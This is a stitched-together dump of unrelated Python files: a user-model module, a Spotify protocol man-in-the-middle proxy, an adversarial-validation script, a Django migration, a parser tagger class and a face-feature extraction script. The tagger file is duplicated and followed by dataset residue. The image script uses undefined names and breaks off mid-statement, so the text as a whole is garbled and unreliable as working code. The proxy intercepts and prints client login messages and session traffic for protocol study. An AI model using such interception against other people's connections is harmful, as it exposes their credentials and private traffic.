# ===== fastproject/modules/users/models.py (repo: jorge4larcon/fastproject) =====
"""Models module."""
import datetime
import uuid
from typing import Any, Optional
import pydantic
from . import contypes, password_validators
class PublicUser(pydantic.BaseModel):
"""Represents user data that can be shared with the public."""
user_id: uuid.UUID
username: str
email: str
first_name: str
last_name: str
is_superuser: bool
is_staff: bool
is_active: bool
date_joined: datetime.datetime
last_login: Optional[datetime.datetime]
class PatchableUserData(pydantic.BaseModel):
"""
Represents user data that can be used to partially update a user in the
database.
"""
username: Optional[contypes.Username] = pydantic.Field(None, description="Username")
email: Optional[pydantic.EmailStr] = pydantic.Field(None, description="Email")
first_name: Optional[contypes.FirstName] = pydantic.Field(
None, description="First name"
)
last_name: Optional[contypes.LastName] = pydantic.Field(
None, description="Last name"
)
password: Optional[contypes.Password] = pydantic.Field(None, description="Password")
is_superuser: Optional[bool] = pydantic.Field(None, description="Is superuser?")
is_staff: Optional[bool] = pydantic.Field(None, description="Is staff?")
is_active: Optional[bool] = pydantic.Field(None, description="Is active?")
date_joined: Optional[datetime.datetime] = pydantic.Field(
None, description="Date joined"
)
last_login: Optional[datetime.datetime] = pydantic.Field(
None, description="Last login"
)
class UserRegistrationData(pydantic.BaseModel):
"""
Represents user data that can be used to register a user in the system and
insert that user in the database.
"""
username: contypes.Username = pydantic.Field(None, description="Username")
email: pydantic.EmailStr = pydantic.Field(None, description="Email")
first_name: contypes.FirstName = pydantic.Field(None, description="First name")
last_name: contypes.LastName = pydantic.Field(None, description="Last name")
password: contypes.Password = pydantic.Field(None, description="Password")
@pydantic.validator("password")
def validate_password(cls, value: str, values: dict[str, Any]) -> str:
"""Validates the password."""
user_attributes = {
"username": values["username"],
"email": values["email"],
"first_name": values["first_name"],
"last_name": values["last_name"],
}
return password_validators.validate_password(
value,
contypes.Password.min_length,
contypes.Password.max_length,
user_attributes,
)
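
# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration; not part of the original
# module). PublicUser uses only standard types, so it can be exercised
# without the project-specific `contypes` constraints; all field values
# below are made up.
if __name__ == "__main__":
    example = PublicUser(
        user_id=uuid.uuid4(),
        username="jdoe",
        email="jdoe@example.com",
        first_name="John",
        last_name="Doe",
        is_superuser=False,
        is_staff=False,
        is_active=True,
        date_joined=datetime.datetime.utcnow(),
        last_login=None,
    )
    print(example.json())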

# ===== proxy.py (repo: kingosticks/spotify-mitm-proxy) =====
from network import Connection
from mercury import MercuryParser
from commands import SpotifyCommand
import hexdump
import os
import zlib
import json
import proto
PRODINFO_FILENAME = 'prodinfo.xml'
class DownstreamConnection(Connection):
def __init__(self, codec):
super(DownstreamConnection, self).__init__(codec, 'downstream')
self.mercury_parser = MercuryParser()
self.final = True
self.handlers.update({
SpotifyCommand.LOGIN: (self.login, proto.ClientResponseEncrypted),
SpotifyCommand.LOG: (self.log, None),
SpotifyCommand.PONG: (self.pong, None),
SpotifyCommand.CLIENT_HASH: (self.client_hash, None),
# used in 0.8.8 client
SpotifyCommand.UNK_1: (self.passthrough_from_downstream, None),
SpotifyCommand.UNK_2: (self.passthrough_from_downstream, None),
SpotifyCommand.UNK_4: (self.passthrough_from_downstream, None),
SpotifyCommand.UNK_5: (self.passthrough_from_downstream, None),
SpotifyCommand.UNK_6: (self.passthrough_from_downstream, None),
SpotifyCommand.BROWSE: (self.passthrough_from_downstream, None),
SpotifyCommand.SEARCH: (self.passthrough_from_downstream, None),
SpotifyCommand.GET_PLAYLIST: (self.passthrough_from_downstream, None),
SpotifyCommand.CHANGE_PLAYLIST: (self.passthrough_from_downstream, None),
SpotifyCommand.UNK_7: (self.passthrough_from_downstream, None),
SpotifyCommand.UNK_8: (self.passthrough_from_downstream, None),
SpotifyCommand.P2P_SETUP: (self.passthrough_from_downstream, None),
# used in 0.9.17 client
SpotifyCommand.UNK_3: (self.passthrough_from_downstream, None),
SpotifyCommand.PLAYLIST_UNK: (self.passthrough_from_downstream, None),
SpotifyCommand.IMAGE: (self.passthrough_from_downstream, None),
SpotifyCommand.CHANNEL_SUBSTREAM: (self.passthrough_from_downstream, None),
SpotifyCommand.CHANNEL_ABORT: (self.passthrough_from_downstream, None),
SpotifyCommand.CHANNEL_DATA: (self.passthrough_from_downstream, None),
SpotifyCommand.CHANNEL_ERROR: (self.passthrough_from_downstream, None),
SpotifyCommand.TOKEN_NOTIFY: (self.passthrough_from_downstream, None),
SpotifyCommand.KEY_REQUEST: (self.passthrough_from_downstream, None),
SpotifyCommand.REQUEST_PLAY: (self.passthrough_from_downstream, None),
# SpotifyCommand.MERCURY_REQUEST: (self.passthrough_from_downstream_quiet, None),
# SpotifyCommand.MERCURY_SUB: (self.passthrough_from_downstream_quiet, None),
# SpotifyCommand.MERCURY_UNSUB: (self.passthrough_from_downstream_quiet, None),
SpotifyCommand.MERCURY_REQUEST: (self.handle_mercury_downstream, None),
SpotifyCommand.MERCURY_SUB: (self.handle_mercury_downstream, None),
SpotifyCommand.MERCURY_UNSUB: (self.handle_mercury_downstream, None),
})
def passthrough_from_downstream_quiet(self, cmd, data):
print 'received command %r len %d downstream' % (cmd, len(data))
self.remote.send_queue.put((cmd, data))
def passthrough_from_downstream(self, cmd, data):
print 'received command %r len %d downstream' % (cmd, len(data))
hexdump.hexdump(data)
self.remote.send_queue.put((cmd, data))
def pong(self, cmd, pong_data):
print 'Received pong'
self.remote.send_queue.put((cmd, pong_data))
def log(self, cmd, log_info):
# print 'Received log event'
# hexdump.hexdump(log_info)
# self.remote.send_queue.put((cmd, log_info))
pass
def client_hash(self, cmd, client_hash):
print 'received client hash downstream'
hexdump.hexdump(client_hash)
self.remote.send_queue.put((cmd, client_hash))
def handle_mercury_downstream(self, cmd, payload):
seq, flags, count, data = self.mercury_parser.parse_header(payload[:])
if flags == 1:
# final
self.final = True
else:
print '!!! not final flag'
self.final = False
seq, frames = self.mercury_parser.parse_packet(payload[:])
print 'had mercury cmd %r downstream' % cmd
# print 'seq %s, |frames| = %d' % (seq.encode('hex'), len(frames))
request = proto.Header()
request.ParseFromString(frames[0])
print 'request was'
print request
payloads = frames[1:]
# assert len(payloads) <= 1
if payloads:
mercury_payload = payloads[0]
else:
mercury_payload = None
if cmd == 0xb3:
method = 'SUB'
elif cmd == 0xb4:
method = 'UNSUB'
else:
method = request.method
if mercury_payload:
hexdump.hexdump(mercury_payload)
if request.uri == 'hm://event-service/v1/events':
if '127.0.0.1' in mercury_payload:
print '** warning: ignoring mercury request to %s' % request.uri
return
# if 'hm://pusher' in request.uri or 'hm://identity/' in request.uri:
# print '** warning: ignoring mercury request to %s' % request.uri
# return
# send it off
# TODO: pass in callback which sends data back to client after inspection
# self.mercury.request(method, request.uri, mercury_payload, mime=request.content_type)
self.remote.send_queue.put((cmd, payload))
def login(self, cmd, client_response_encrypted):
print 'downstream attempted to login with:'
print client_response_encrypted
self.remote.send_queue.put((cmd, client_response_encrypted.SerializeToString()))
class UpstreamConnection(Connection):
def __init__(self, codec):
super(UpstreamConnection, self).__init__(codec, 'upstream')
self.mercury_parser = MercuryParser()
self.final = True
self.handlers.update({
SpotifyCommand.PING: (self.ping, None),
SpotifyCommand.PONG_ACK: (self.pongack, None),
SpotifyCommand.LOGIN_SUCCESS: (self.login_success, proto.APWelcome),
SpotifyCommand.LOGIN_FAILURE: (self.passthrough_from_upstream, None),
SpotifyCommand.WELCOME: (self.passthrough_from_upstream, None),
SpotifyCommand.UNK_ZEROES: (self.unk_for_auth, None),
SpotifyCommand.UNK_0: (self.passthrough_from_upstream, None),
# from 0.8.8 client
SpotifyCommand.P2P_INITBLK: (self.passthrough_from_upstream, None),
# used in 0.9.17 client
SpotifyCommand.CHANNEL_ABORT: (self.passthrough_from_upstream, None),
SpotifyCommand.CHANNEL_DATA: (self.passthrough_from_upstream, None),
SpotifyCommand.CHANNEL_ERROR: (self.passthrough_from_upstream, None),
SpotifyCommand.KEY_AES_DATA: (self.passthrough_from_upstream, None),
SpotifyCommand.KEY_AES_ERROR: (self.passthrough_from_upstream, None),
SpotifyCommand.SHA_HASH: (self.passthrough_from_upstream, None),
SpotifyCommand.PRODINFO: (self.handle_prodinfo, None),
SpotifyCommand.SECRET_BLK: (self.handle_secret_blk, None),
SpotifyCommand.COUNTRY_CODE: (self.handle_country_code, None),
# SpotifyCommand.MERCURY_REQUEST: (self.passthrough_from_upstream_quiet, None),
# SpotifyCommand.MERCURY_SUB: (self.passthrough_from_upstream_quiet, None),
# SpotifyCommand.MERCURY_UNSUB: (self.passthrough_from_upstream_quiet, None),
# SpotifyCommand.MERCURY_NOTIFY: (self.passthrough_from_upstream_quiet, None),
# SpotifyCommand.MERCURY_CB: (self.passthrough_from_upstream_quiet, None),
SpotifyCommand.MERCURY_REQUEST: (self.handle_mercury_upstream, None),
SpotifyCommand.MERCURY_SUB: (self.handle_mercury_upstream, None),
SpotifyCommand.MERCURY_UNSUB: (self.handle_mercury_upstream, None),
SpotifyCommand.MERCURY_NOTIFY: (self.handle_mercury_upstream, None),
SpotifyCommand.MERCURY_CB: (self.handle_mercury_upstream, None),
})
def login_success(self, cmd, resp):
print 'upstream reports login success!'
print resp
self.remote.send_queue.put((cmd, resp.SerializeToString()))
def passthrough_from_upstream_quiet(self, cmd, data):
print 'received command %r len %d upstream' % (cmd, len(data))
self.remote.send_queue.put((cmd, data))
def passthrough_from_upstream(self, cmd, data):
print 'received command %r len %d upstream' % (cmd, len(data))
hexdump.hexdump(data)
self.remote.send_queue.put((cmd, data))
def unk_for_auth(self, cmd, data):
print 'received weird auth cmd %r upstream' % cmd
hexdump.hexdump(data)
self.remote.send_queue.put((cmd, data))
def handle_prodinfo(self, cmd, prodxml):
if not os.path.exists(PRODINFO_FILENAME):
print 'saving prodinfo to', PRODINFO_FILENAME
with open(PRODINFO_FILENAME, 'wb') as f:
f.write(prodxml)
else:
print 'using prodinfo data from', PRODINFO_FILENAME
with open(PRODINFO_FILENAME, 'rb') as f:
prodxml = f.read()
self.remote.send_queue.put((cmd, prodxml))
def handle_country_code(self, cmd, country_code):
print 'received country code', country_code, 'from upstream'
self.remote.send_queue.put((cmd, country_code))
def handle_secret_blk(self, cmd, secret_data):
print 'received secret block upstream'
self.remote.send_queue.put((cmd, secret_data))
# client uses this to sign their offline key
# secret_data[16:16 + 128] is rsa public exponent
# secret_data[16 + 128:] is 144 byte rsa signature?
# see despotify/src/lib/handlers.c - handle_secret_block()
def ping(self, cmd, ping_data):
print 'received ping from upstream'
self.remote.send_queue.put((cmd, ping_data))
def pongack(self, cmd, pong_ack_data):
print 'received pong-ack from upstream'
self.remote.send_queue.put((cmd, pong_ack_data))
def handle_mercury_upstream(self, cmd, payload):
# seq, flags, count, data = self.mercury_parser.parse_header(payload[:])
seq, frames = self.mercury_parser.parse_packet(payload[:])
if frames is None:
print 'received incomplete mercury response with cmd %r upstream' % cmd
self.remote.send_queue.put((cmd, payload))
return
print 'received complete mercury response with cmd %r upstream' % cmd
response = proto.Header()
response.ParseFromString(frames[0])
# if response.uri.startswith('hm://pusher/v1/connections/') or response.uri.startswith('hm://identity/v1/user/'):
# print '** skipping'
# print 'remaining frames are:', frames
# return
# split_uri = response.uri.split('/')
# prefix = split_uri[:-1]
# dest_b64 = split_uri[-1]
# pusher_decoded = base64.b64decode(dest_b64)
# pusher_fields = pusher_decoded.split('+')
# # first field is device_id from login request
# # second is AP
# # third is 'tcp://gae2-accesspoint-b-mzf1.gae2.spotify.net:5026'
# # last is some hash (probably sha256 of something)
# pusher_fields[2] = 'tcp://'
print response
if len(frames[1:]) > 0:
# print payload if we have it here
for payload_frame in frames[1:]:
kv = {}
for user_field in response.user_fields:
kv[user_field.key.lower()] = user_field.value
if 'content-encoding' in kv:
if kv['content-encoding'] == 'gzip':
# decode response first
payload_frame = zlib.decompress(payload_frame, 16+zlib.MAX_WBITS)
if 'application/json' in response.content_type:
j = json.loads(payload_frame)
print json.dumps(j, indent=2)
else:
hexdump.hexdump(payload_frame)
        self.remote.send_queue.put((cmd, payload))
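
# ---------------------------------------------------------------------------
# Note (added; an assumption, since the Connection base class from `network`
# is not shown in this file): both classes forward frames through
# self.remote.send_queue, so the surrounding proxy presumably builds one
# DownstreamConnection (towards the Spotify client) and one UpstreamConnection
# (towards the access point) and cross-links them, roughly:
#
#     downstream = DownstreamConnection(client_codec)
#     upstream = UpstreamConnection(ap_codec)
#     downstream.remote, upstream.remote = upstream, downstream
#
# The codec objects and the exact wiring are illustrative, not confirmed here.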

# ===== validation/adval.py (repo: alikula314/adval) =====
import pandas as pd
import numpy as np
import seaborn as sns
from matplotlib import pyplot as plt
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import train_test_split
import xgboost as xgb
from xgboost import cv
class adVala:
def __init__(self, train, test, similarity_ratio ,target, id):
self.train = train
self.test = test
self.target = target
        self.id = id
self.similarity_ratio = similarity_ratio
def auc_score(self):
train = self.train.drop(columns=[self.target, self.id], errors='ignore')
test = self.test.drop(columns=[self.target , self.id], errors='ignore')
X_test = test.select_dtypes(include=['number']).copy()
X_train = train.select_dtypes(include=['number']).copy()
# add the train/test labels
X_train["AV_label"] = 0
X_test["AV_label"] = 1
# make one big dataset
all_data = pd.concat([X_train, X_test], axis=0, ignore_index=True)
# shuffle
all_data_shuffled = all_data.sample(frac=1)
# create our DMatrix (the XGBoost data structure)
X = all_data_shuffled.drop(['AV_label'], axis=1)
y = all_data_shuffled['AV_label']
XGBdata = xgb.DMatrix(data=X,label=y)
# our XGBoost parameters
params = {"objective":"binary:logistic",
"eval_metric":"logloss",
'learning_rate': 0.05,
'max_depth': 6, }
# perform cross validation with XGBoost
cross_val_results = cv(dtrain=XGBdata, params=params,
nfold=5, metrics="auc",
num_boost_round=200,early_stopping_rounds=20,
as_pandas=True)
# print out the final result
score = (cross_val_results["test-auc-mean"]).iloc[-1]
sc = 100 - ((score - 0.5) * 200 )
sr = self.similarity_ratio
        if sc >= sr:
            print("Train and test data are similar, Similarity Ratio: %{:.4}".format(sc))
        else:
            print("Train and test data are not similar, Similarity Ratio: %{:.4}".format(sc))
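
# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration; the column names, the 95%
# similarity threshold and the synthetic data are assumptions, not part of
# the original module).
if __name__ == "__main__":
    rng = np.random.default_rng(0)
    train_df = pd.DataFrame({
        "id": range(100),
        "feature": rng.normal(0.0, 1.0, 100),
        "target": rng.integers(0, 2, 100),
    })
    test_df = pd.DataFrame({
        "id": range(100, 200),
        "feature": rng.normal(0.0, 1.0, 100),
    })
    validator = adVala(train_df, test_df, similarity_ratio=95, target="target", id="id")
    validator.auc_score()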

# ===== hello/migrations/0016_auto_20210123_1614.py (repo: StafaH/jamm-bandit) =====
# Generated by Django 3.1.4 on 2021-01-23 16:14
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hello', '0015_duelrecord_second_arm_wins'),
]
operations = [
migrations.AlterField(
model_name='duelrecord',
name='first_arm',
field=models.IntegerField(db_index=True),
),
migrations.AlterField(
model_name='duelrecord',
name='second_arm',
field=models.IntegerField(db_index=True),
),
    ]

# ===== Parser-hybrid/nparser/neural/models/nlp/taggers/base_tagger.py (repo: sb-b/BOUN-PARSE) =====
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2016 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import re
import codecs
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from nparser.misc.colors import ctext, color_pattern
from nparser.neural.models.nn import NN
#***************************************************************
class BaseTagger(NN):
""" """
PAD = 0
ROOT = 1
#=============================================================
def __call__(self, vocabs, moving_params=None):
""" """
self.moving_params = moving_params
if isinstance(vocabs, dict):
self.vocabs = vocabs
else:
self.vocabs = {vocab.name: vocab for vocab in vocabs}
input_vocabs = [self.vocabs[name] for name in self.input_vocabs]
embed = self.embed_concat(input_vocabs)
for vocab in list(self.vocabs.values()):
if vocab not in input_vocabs:
vocab.generate_placeholder()
placeholder = self.vocabs['words'].placeholder
if len(placeholder.get_shape().as_list()) == 3:
placeholder = placeholder[:,:,0]
self._tokens_to_keep = tf.to_float(tf.greater(placeholder, self.ROOT))
self._batch_size = tf.shape(placeholder)[0]
self._bucket_size = tf.shape(placeholder)[1]
self._sequence_lengths = tf.reduce_sum(tf.to_int32(tf.greater(placeholder, self.PAD)), axis=1)
self._n_tokens = tf.to_int32(tf.reduce_sum(self.tokens_to_keep))
top_recur = embed
for i in range(self.n_layers):
with tf.variable_scope('RNN%d' % i):
top_recur, _ = self.RNN(top_recur, self.recur_size)
return top_recur
#=============================================================
def process_accumulators(self, accumulators, time=None):
""" """
n_tokens, n_seqs, loss, corr, seq_corr = accumulators
acc_dict = {
'Loss': loss,
'TS': corr/n_tokens*100,
'SS': seq_corr/n_seqs*100,
}
if time is not None:
acc_dict.update({
'Token_rate': n_tokens / time,
'Seq_rate': n_seqs / time,
})
return acc_dict
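  # Note (added comment): with the `train_keys` accumulator tuple
  # (n_tokens, n_seqs, loss, n_correct, n_seqs_correct), e.g.
  # (1000, 40, 3.2, 950, 22), this returns
  # {'Loss': 3.2, 'TS': 95.0, 'SS': 55.0}, i.e. token and sequence accuracy
  # in percent.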
#=============================================================
def update_history(self, history, accumulators):
""" """
acc_dict = self.process_accumulators(accumulators)
for key, value in acc_dict.items():
history[key].append(value)
return history['TS'][-1]
#=============================================================
def print_accuracy(self, accumulators, time, prefix='Train'):
""" """
acc_dict = self.process_accumulators(accumulators, time=time)
strings = []
strings.append(color_pattern('Loss:', '{Loss:7.3f}', 'bright_red'))
strings.append(color_pattern('TS:', '{TS:5.2f}%', 'bright_cyan'))
strings.append(color_pattern('SS:', '{SS:5.2f}%', 'bright_green'))
strings.append(color_pattern('Speed:', '{Seq_rate:6.1f} seqs/sec', 'bright_magenta'))
string = ctext('{0} ', 'bold') + ' | '.join(strings)
print(string.format(prefix, **acc_dict),file=sys.stderr)
return
#=============================================================
def plot(self, history, prefix='Train'):
""" """
pass
#=============================================================
def check(self, preds, sents, fileobj):
""" """
for tokens, preds in zip(sents, preds[0]):
for token, pred in zip(list(zip(*tokens)), preds):
tag = self.vocabs['tags'][pred]
fileobj.write('\t'.join(token+(tag, ))+'\n')
fileobj.write('\n')
return
#=============================================================
def write_probs(self, sents, output_file, probs, inv_idxs, metadata):
""" """
# Turns list of tuples of tensors into list of matrices
tag_probs = [tag_prob for batch in probs for tag_prob in batch[0]]
tokens_to_keep = [weight for batch in probs for weight in batch[1]]
tokens = [sent for batch in sents for sent in batch]
with codecs.open(output_file, 'w', encoding='utf-8', errors='ignore') as f:
for meta_idx,i in enumerate(inv_idxs):
sent, tag_prob, weights = tokens[i], tag_probs[i], tokens_to_keep[i]
sent = list(zip(*sent))
tag_preds = np.argmax(tag_prob, axis=1)
sent_meta=metadata[meta_idx]
if sent_meta["comments"]:
f.write("\n".join(sent_meta["comments"]))
f.write("\n")
for tok_idx,(token, tag_pred, weight) in enumerate(zip(sent, tag_preds[1:], weights[1:])):
          for b, e in sent_meta["multiwordtokens"]:  # per-sentence metadata (was metadata["multiwordtokens"], which would fail when metadata is a list)
if tok_idx+1==b: #there goes a multiword right here!
f.write("{}-{}".format(b,e))
f.write("\t_"*9)
f.write("\n")
token = list(token)
token.insert(5, sent_meta["feats"][tok_idx])
token.append('_')
token.append(sent_meta["miscfield"][tok_idx])
token[3] = self.vocabs['tags'][tag_pred]
f.write('\t'.join(token)+'\n')
if sent:
f.write('\n')
return
#=============================================================
@property
def train_keys(self):
return ('n_tokens', 'n_seqs', 'loss', 'n_correct', 'n_seqs_correct')
#=============================================================
@property
def valid_keys(self):
return ('preds', )
#=============================================================
@property
def parse_keys(self):
return ('probs', 'tokens_to_keep')
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2016 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import re
import codecs
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from nparser.misc.colors import ctext, color_pattern
from nparser.neural.models.nn import NN
#***************************************************************
class BaseTagger(NN):
""" """
PAD = 0
ROOT = 1
#=============================================================
def __call__(self, vocabs, moving_params=None):
""" """
self.moving_params = moving_params
if isinstance(vocabs, dict):
self.vocabs = vocabs
else:
self.vocabs = {vocab.name: vocab for vocab in vocabs}
input_vocabs = [self.vocabs[name] for name in self.input_vocabs]
embed = self.embed_concat(input_vocabs)
for vocab in list(self.vocabs.values()):
if vocab not in input_vocabs:
vocab.generate_placeholder()
placeholder = self.vocabs['words'].placeholder
if len(placeholder.get_shape().as_list()) == 3:
placeholder = placeholder[:,:,0]
self._tokens_to_keep = tf.to_float(tf.greater(placeholder, self.ROOT))
self._batch_size = tf.shape(placeholder)[0]
self._bucket_size = tf.shape(placeholder)[1]
self._sequence_lengths = tf.reduce_sum(tf.to_int32(tf.greater(placeholder, self.PAD)), axis=1)
self._n_tokens = tf.to_int32(tf.reduce_sum(self.tokens_to_keep))
top_recur = embed
for i in range(self.n_layers):
with tf.variable_scope('RNN%d' % i):
top_recur, _ = self.RNN(top_recur, self.recur_size)
return top_recur
#=============================================================
def process_accumulators(self, accumulators, time=None):
""" """
n_tokens, n_seqs, loss, corr, seq_corr = accumulators
acc_dict = {
'Loss': loss,
'TS': corr/n_tokens*100,
'SS': seq_corr/n_seqs*100,
}
if time is not None:
acc_dict.update({
'Token_rate': n_tokens / time,
'Seq_rate': n_seqs / time,
})
return acc_dict
#=============================================================
def update_history(self, history, accumulators):
""" """
acc_dict = self.process_accumulators(accumulators)
for key, value in acc_dict.items():
history[key].append(value)
return history['TS'][-1]
#=============================================================
def print_accuracy(self, accumulators, time, prefix='Train'):
""" """
acc_dict = self.process_accumulators(accumulators, time=time)
strings = []
strings.append(color_pattern('Loss:', '{Loss:7.3f}', 'bright_red'))
strings.append(color_pattern('TS:', '{TS:5.2f}%', 'bright_cyan'))
strings.append(color_pattern('SS:', '{SS:5.2f}%', 'bright_green'))
strings.append(color_pattern('Speed:', '{Seq_rate:6.1f} seqs/sec', 'bright_magenta'))
string = ctext('{0} ', 'bold') + ' | '.join(strings)
print(string.format(prefix, **acc_dict),file=sys.stderr)
return
#=============================================================
def plot(self, history, prefix='Train'):
""" """
pass
#=============================================================
def check(self, preds, sents, fileobj):
""" """
for tokens, preds in zip(sents, preds[0]):
for token, pred in zip(list(zip(*tokens)), preds):
tag = self.vocabs['tags'][pred]
fileobj.write('\t'.join(token+(tag, ))+'\n')
fileobj.write('\n')
return
#=============================================================
def write_probs(self, sents, output_file, probs, inv_idxs, metadata):
""" """
# Turns list of tuples of tensors into list of matrices
tag_probs = [tag_prob for batch in probs for tag_prob in batch[0]]
tokens_to_keep = [weight for batch in probs for weight in batch[1]]
tokens = [sent for batch in sents for sent in batch]
with codecs.open(output_file, 'w', encoding='utf-8', errors='ignore') as f:
for meta_idx,i in enumerate(inv_idxs):
sent, tag_prob, weights = tokens[i], tag_probs[i], tokens_to_keep[i]
sent = list(zip(*sent))
tag_preds = np.argmax(tag_prob, axis=1)
sent_meta=metadata[meta_idx]
if sent_meta["comments"]:
f.write("\n".join(sent_meta["comments"]))
f.write("\n")
for tok_idx,(token, tag_pred, weight) in enumerate(zip(sent, tag_preds[1:], weights[1:])):
for b,e in metadata["multiwordtokens"]:
if tok_idx+1==b: #there goes a multiword right here!
f.write("{}-{}".format(b,e))
f.write("\t_"*9)
f.write("\n")
token = list(token)
token.insert(5, sent_meta["feats"][tok_idx])
token.append('_')
token.append(sent_meta["miscfield"][tok_idx])
token[3] = self.vocabs['tags'][tag_pred]
f.write('\t'.join(token)+'\n')
if sent:
f.write('\n')
return
#=============================================================
@property
def train_keys(self):
return ('n_tokens', 'n_seqs', 'loss', 'n_correct', 'n_seqs_correct')
#=============================================================
@property
def valid_keys(self):
return ('preds', )
#=============================================================
@property
def parse_keys(self):
return ('probs', 'tokens_to_keep') | en | 0.562647 | #!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright 2016 <NAME> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #*************************************************************** #============================================================= #============================================================= #============================================================= #============================================================= #============================================================= #============================================================= #============================================================= # Turns list of tuples of tensors into list of matrices #there goes a multiword right here! #============================================================= #============================================================= #============================================================= | 2.405093 | 2 |

# ===== scripts/image_features.py (repo: sharleynelefevre/pyannote-db-plumcot) =====
#!/usr/bin/env python
# coding: utf-8
"""
Extracts features from images given IMDB-compliant JSON file,
described in `CONTRIBUTING.md` (scraped in `image_scraping`)
"""
# Dependencies
## core
import numpy as np
import os
import json
import warnings
from shutil import copyfile
## ML/image processing
import imageio
from pyannote.video import Face
from pyannote.video.utils.scale_frame import scale_up_bbox, rectangle_to_bbox
## clustering
from pyannote.core.utils.distance import cdist,pdist
from scipy.spatial.distance import squareform
from scipy.cluster.hierarchy import fcluster
from pyannote.core.utils.hierarchy import linkage,fcluster_auto
#Hyperparameters are defined in scripts/images.py
MODEL_NAME="dlib_face_recognition_resnet_model_v1"
DLIB_MODELS="/people/lerner/pyannote/pyannote-video/dlib-models"
DLIB_EMBEDDING=os.path.join(DLIB_MODELS,f"{MODEL_NAME}.dat")
DLIB_LANDMARKS=os.path.join(DLIB_MODELS,"shape_predictor_68_face_landmarks.dat")
DLIB_THRESHOLD=0.6#threshold for clustering, see https://github.com/davisking/dlib-models
MIN_IMAGES=5
EMBEDDING_DIM=128
EMBEDDING_DTYPE=('embeddings', 'float64', (EMBEDDING_DIM,))
BBOX_DTYPE=('bbox', 'float64', (4,))
CLUSTERING_THRESHOLD=DLIB_THRESHOLD#'auto'
CLUSTERING_METHOD='complete'
KEEP_IMAGE_TYPES={'still_frame'}
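# NOTE (added comment): IMAGE_PATH is used below (compute_references,
# compute_references_per_character and the __main__ block) but is not defined
# in this file as dumped; presumably it is one of the hyperparameters from
# scripts/images.py mentioned above and has to be imported or defined here.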
def extract_image(rgb,landmarks_model,embedding_model,output,
return_landmarks=False,return_embedding=False):
"""Facial features detection for an rgb image
Parameters
----------
rgb : np.array
RGB image to be processed
landmarks : str
Path to dlib's 68 facial landmarks predictor model.
embedding : str
Path to dlib's face embedding model.
output : str
Path to features result file (should end with `.npy`).
return_landmarks : bool
Whether to save landmarks. Defaults to False.
return_embedding : bool
Whether to save embedding. Defaults to False.
"""
face = Face(landmarks=landmarks_model,embedding=embedding_model)
faces=[]
frame_height=rgb.shape[0]
frame_width=rgb.shape[1]
for rectangle in face(rgb):
bbox=rectangle_to_bbox(rectangle,frame_width,frame_height)
result=(bbox,)
if return_landmarks or return_embedding:
landmarks = face.get_landmarks(rgb, rectangle)
if return_landmarks:
landmarks=parts_to_landmarks(landmarks,frame_width,frame_height)
result+=(landmarks,)
if return_embedding:
embedding = face.get_embedding(rgb, landmarks)
result+=(embedding,)
faces.append(result)
face_dtype=[BBOX_DTYPE]
if return_landmarks:
face_dtype+=[LANDMARKS_DTYPE]
if return_embedding:
face_dtype+=[EMBEDDING_DTYPE]
faces=np.array(
faces,
dtype=face_dtype
)
np.save(output,faces)
def image_to_output_path(image_path,MODEL_NAME):
dir_path,file_name=os.path.split(image_path)
file_uri=os.path.splitext(file_name)[0]
#HACK should not be necessary if images have been scrapped with a low enough MAX_FILE_NAME_LENGTH
if len(file_uri) > 128:
names,counter=file_uri.split(".")
names=names[:128]+"#trim#"
file_uri=f"{names}.{counter}"
output_path=os.path.join(dir_path,f"{MODEL_NAME}.{file_uri}.npy")
return output_path
def compute_features(image_jsons,MODEL_NAME,DLIB_LANDMARKS,DLIB_EMBEDDING):
grayscale=0
no_image=0
not_exists=0
for i,image_json in enumerate(image_jsons['allImages']):
print((
f"\rimage {i+1}/{image_jsons['totalImageCount']}."
),end=" ")
image_path=image_json.get("path")
if image_path is not None:
image_path=image_path[0]
if not os.path.exists(image_path):
not_exists+=1
continue
else:
rgb = imageio.imread(image_path)
if len(rgb.shape)==2:
grayscale+=1
continue#dlib doesn't handle grayscale images
else:
no_image+=1
continue
output_path=image_to_output_path(image_path,MODEL_NAME)
extract_image(rgb,landmarks_model=DLIB_LANDMARKS,embedding_model=DLIB_EMBEDDING,output=output_path,
return_landmarks=False,return_embedding=True)
#update features path per image
image_jsons['allImages'][i]["features"]=[output_path]
for image_path in image_json['path'][1:]:
other_output_path=image_to_output_path(image_path,MODEL_NAME)
copyfile(output_path,other_output_path)
image_jsons['allImages'][i]["features"].append(other_output_path)
#update features path per character
feature_object={
"path":output_path,
"model_name":MODEL_NAME,
"imageType":image_json['imageType']
}
characters=image_json['label']
for character in characters:
if "features" in image_jsons['characters'][character]:
image_jsons['characters'][character]["features"].append(feature_object)
else:
image_jsons['characters'][character]["features"]=[feature_object]
print((
f"\nThere are {grayscale} grayscale images over {image_jsons['totalImageCount']-no_image-not_exists}.\n"
f"Over {image_jsons['totalImageCount']} images, {not_exists} do not exist "
f"and {no_image} were never scraped because of a lack of labelling."
